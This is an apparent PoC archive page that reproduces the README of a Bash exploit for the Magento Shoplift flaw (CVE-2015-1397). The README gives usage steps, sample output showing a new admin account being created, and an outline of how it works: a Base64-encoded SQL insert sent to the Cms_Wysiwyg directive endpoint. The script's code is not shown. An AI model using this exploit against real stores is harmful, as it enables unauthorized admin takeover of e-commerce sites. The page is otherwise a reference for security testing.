关联漏洞
介绍
# Magento Shoplift Exploit (SUPEE-5344) - CVE-2015-1397
## Overview
This script exploits the **CVE-2015-1397** vulnerability in Magento, commonly referred to as the Magento Shoplift exploit. It allows an attacker to create a new admin user in the Magento database by injecting SQL payloads.
Originally written in Python by **Manish Kishan Tanwar (error1046)**, this version has been converted to **Bash** with user-friendly input prompts for credentials by **Divine Clown (0xDTC)**.
---
## Features
- **Credential Prompt**: Dynamically prompts for the target URL, admin username, and password.
- **Error Handling**: Provides detailed error messages for invalid inputs, failed network requests, and unexpected server responses.
- **Base64 Encoding**: Encodes payloads dynamically for Magento's processing.
- **Simplified User Experience**: Removes the need for manual payload encoding or static inputs.
---
## Prerequisites
- **Target**: The Magento installation must be vulnerable to CVE-2015-1397.
- **Environment**: Linux with `bash`, `curl`, and `base64` utilities installed.
---
## Usage
1. Clone the repository or copy the script to your local system.
2. Make the script executable:
```bash
chmod +x CVE-2015-1397
```
3. Run the script:
```bash
./CVE-2015-1397
```
4. Follow the prompts:
- Enter the **target URL** (e.g., `http://target.com/`).
- Enter the **new admin username**.
- Enter the **new admin password**.
5. If successful, the script will output the newly created admin credentials.
---
## Example
```bash
┌──(kali㉿kali)-[~/example]
└─$ ./CVE-2015-1397
Enter the target URL (e.g., http://target.com/): http://example.com/
Enter the new admin username: admin123
Enter the new admin password: pass123
[*] Sending payload to http://example.com/admin/Cms_Wysiwyg/directive/index/
[+] Exploit successful. Admin account created: admin123 / pass123
```
---
## How It Works
1. **Input Validation**:
- Ensures the provided URL starts with `http://` or `https://`.
- Validates that the username and password are not empty.
2. **Payload Construction**:
- Constructs a Base64-encoded `___directive` parameter containing an SQL query to insert a new admin user.
- Encodes the SQL query dynamically.
3. **Exploitation**:
- Sends a `POST` request to the vulnerable endpoint using `curl`.
- Uses Magento's internal directive parsing to execute the SQL payload.
4. **Response Handling**:
- Checks the server's response for indicators of success or failure.
- Handles common errors like invalid URL, empty response, or network issues.
---
## Error Handling
- **Invalid URL**: Ensures the target URL starts with `http://` or `https://`.
- **Empty Inputs**: Validates that neither username nor password is empty.
- **Network Issues**: Reports if the connection to the target fails.
- **Empty Server Response**: Alerts the user if the server does not return a response.
- **Unsuccessful Exploit**: Displays the server's response for debugging purposes.
---
## Legal Disclaimer
This script is intended for **educational purposes** only. Unauthorized use against systems you do not own or have permission to test is illegal and unethical. The author and contributors are not responsible for any misuse of this tool.
---
## Acknowledgments
Special thanks to:
- Original Python script author: Manish Kishan Tanwar (error1046)
- Security researchers and community contributors for documenting CVE-2015-1397.
---
## References
- [CVE-2015-1397 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1397)
- [Checkpoint Research Blog](https://blog.checkpoint.com/)
- [Magento Vulnerability Documentation](https://magento.com/security)
文件快照
[4.0K] /data/pocs/fdc72a04348f66ba0b1d0571e0493f10c7ba1722
├── [5.4K] CVE-2015-1397
└── [3.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。